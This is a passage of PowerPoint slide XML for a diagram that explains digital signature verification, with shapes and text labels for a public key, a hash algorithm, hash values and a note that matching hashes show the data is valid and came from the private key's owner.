                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200"/>
                <a:t>Hash Value</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="18000000">
            <a:off x="6494497" y="4762782"/>
            <a:ext cx="2682241" cy="20297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99" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="912" y="157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1225" y="254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905" y="470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2232" y="587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2572" y="724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926" y="880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3267" y="1037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988" y="1389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4723" y="1780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5444" y="2230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6193" y="2680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6969" y="3209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7717" y="3737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8493" y="4304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9255" y="4891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10004" y="5498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10752" y="6124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11501" y="6770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12236" y="7415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12944" y="8100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14332" y="9430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15611" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16224" y="11485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16795" y="12170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17340" y="12815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17857" y="13461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18333" y="14087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18769" y="14713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19136" y="15300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19490" y="15867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19654" y="16122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19790" y="16415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20035" y="16924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20048" y="16865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20103" y="16748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20307" y="16474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20579" y="16024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21096" y="18822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21450" y="20759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21450" y="21483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21069" y="21091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19912" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18197" y="18254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18633" y="18078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18878" y="18000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19000" y="17941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18960" y="17863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18919" y="17746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18783" y="17491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18606" y="17178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18374" y="16807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18088" y="16396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17775" y="15907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17027" y="14830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16591" y="14263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16129" y="13637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15611" y="12991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15081" y="12307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14509" y="11622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13896" y="10917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12617" y="9430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11936" y="8726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11229" y="7983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10494" y="7259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9772" y="6554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8997" y="5830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8234" y="5126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7445" y="4480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6628" y="3815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6234" y="3502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825" y="3209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5022" y="2602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4192" y="2074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3770" y="1820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3335" y="1546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926" y="1330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2504" y="1096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2096" y="880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1660" y="685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1252" y="470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="926" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7195537" y="5055164"/>
            <a:ext cx="1948463" cy="1625601"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1948462" cy="1625600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="924" name="Key_Private01" descr="Key_Private01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="824089" cy="1625600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="925" name="User A Public  Key"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="776675" y="406400"/>
              <a:ext cx="1171788" cy="10215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p>
              <a:pPr defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>User A Public </a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="927" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1461039">
            <a:off x="8369582" y="3847253"/>
            <a:ext cx="2485814" cy="11288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07" y="13442"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20448" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20355" y="12343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20276" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20077" y="11314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19865" y="10605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19640" y="10002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="9328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19137" y="8690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="8087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18581" y="7484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18302" y="6916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17640" y="5781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17322" y="5249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16952" y="4753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16594" y="4292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16223" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15826" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15415" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="2589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14594" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14170" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13733" y="1561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13270" y="1312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="1029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12343" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11866" y="638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11389" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10913" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10158" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9390" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8886" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8237" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7588" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6953" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6344" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026" y="567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5721" y="674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5125" y="958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4556" y="1241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3973" y="1596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3417" y="2022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="4079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="4646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424" y="5320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411" y="5462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="834" y="5001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1258" y="4575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159" y="3760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2384" y="3618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2609" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072" y="3086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3576" y="2837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4052" y="2518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4569" y="2341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5072" y="2128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5589" y="1986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="1880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6661" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7734" y="1667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8264" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8754" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9257" y="1809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9734" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10237" y="2057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10701" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11177" y="2447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11641" y="2625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12542" y="3192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12979" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13402" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13826" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14223" y="4540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14634" y="4966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="5427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15376" y="5817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15746" y="6278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16104" y="6810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16435" y="7306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766" y="7838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17084" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17667" y="9541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18196" y="10747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18435" y="11421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="12059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19071" y="13442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19243" y="14116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="14826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19031" y="14967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="15145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21176" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20607" y="13442"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="930" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9019822" y="2591815"/>
            <a:ext cx="1359183" cy="1844719"/>
            <a:chOff x="0" y="-5079"/>
            <a:chExt cx="1359182" cy="1844717"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="928" name="Hash…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="99547" y="-5081"/>
              <a:ext cx="1110417" cy="79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p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200"/>
                <a:t>Hash </a:t>
              </a:r>
              <a:endParaRPr sz="2200"/>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200"/>
                <a:t>Algorithm</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="929" name="ServerProcess01" descr="ServerProcess01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="796544"/>
              <a:ext cx="1359183" cy="1043094"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="933" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7433240" y="7473244"/>
            <a:ext cx="1310418" cy="1601779"/>
            <a:chOff x="22731" y="0"/>
            <a:chExt cx="1310416" cy="1601777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="931" name="Policy_Writing01" descr="Policy_Writing01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="247738" y="0"/>
              <a:ext cx="914536" cy="1218397"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="932" name="Hash Value"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="22731" y="1141529"/>
              <a:ext cx="1310418"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2200">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200"/>
                <a:t>Hash Value</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="936" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9247858" y="7114258"/>
            <a:ext cx="2973494" cy="2047805"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2973493" cy="2047804"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="934" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2973494" cy="2047805"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="E8F6E4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="ADE2A1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="935" name="If hash values match, data came from the owner of the private key and is valid"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="25028" y="350230"/>
              <a:ext cx="2923437" cy="13473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1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>If hash values match, data came from the owner of the private key and is valid</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="940" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4158826" y="3450604"/>
            <a:ext cx="1535290" cy="1374268"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1535288" cy="1374267"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="937" name="Notepad_Notepad01" descr="Notepad_Notepad01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="0" y="540147"/>
              <a:ext cx="1535289" cy="834121"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="938" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="385525" y="850898"/>
              <a:ext cx="585781" cy="2098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094"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="553" y="17673"/>
                    <a:pt x="1155" y="17813"/>
                    <a:pt x="1607" y="16971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2411" y="15569"/>
                    <a:pt x="3667" y="11361"/>
                    <a:pt x="3667" y="11361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3516" y="10239"/>
                    <a:pt x="3717" y="7855"/>
                    <a:pt x="3265" y="7855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2813" y="7855"/>
                    <a:pt x="2863" y="10099"/>
                    <a:pt x="2863" y="11361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2863" y="14727"/>
                    <a:pt x="3114" y="18234"/>
                    <a:pt x="3265" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4873" y="18655"/>
                    <a:pt x="5224" y="17813"/>
                    <a:pt x="5676" y="12483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7836" y="14447"/>
                    <a:pt x="7133" y="11922"/>
                    <a:pt x="8540" y="7855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9996" y="12203"/>
                    <a:pt x="10197" y="13184"/>
                    <a:pt x="11403" y="7855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11654" y="8696"/>
                    <a:pt x="11805" y="10239"/>
                    <a:pt x="12207" y="10239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12709" y="10239"/>
                    <a:pt x="12960" y="8275"/>
                    <a:pt x="13462" y="7855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14517" y="7013"/>
                    <a:pt x="15622" y="7153"/>
                    <a:pt x="16727" y="6732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18887" y="4769"/>
                    <a:pt x="17581" y="6312"/>
                    <a:pt x="20394" y="1122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20746" y="421"/>
                    <a:pt x="21600" y="0"/>
                    <a:pt x="21600" y="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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="939" name="Pen01" descr="Pen01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="1800000">
              <a:off x="1066664" y="-39102"/>
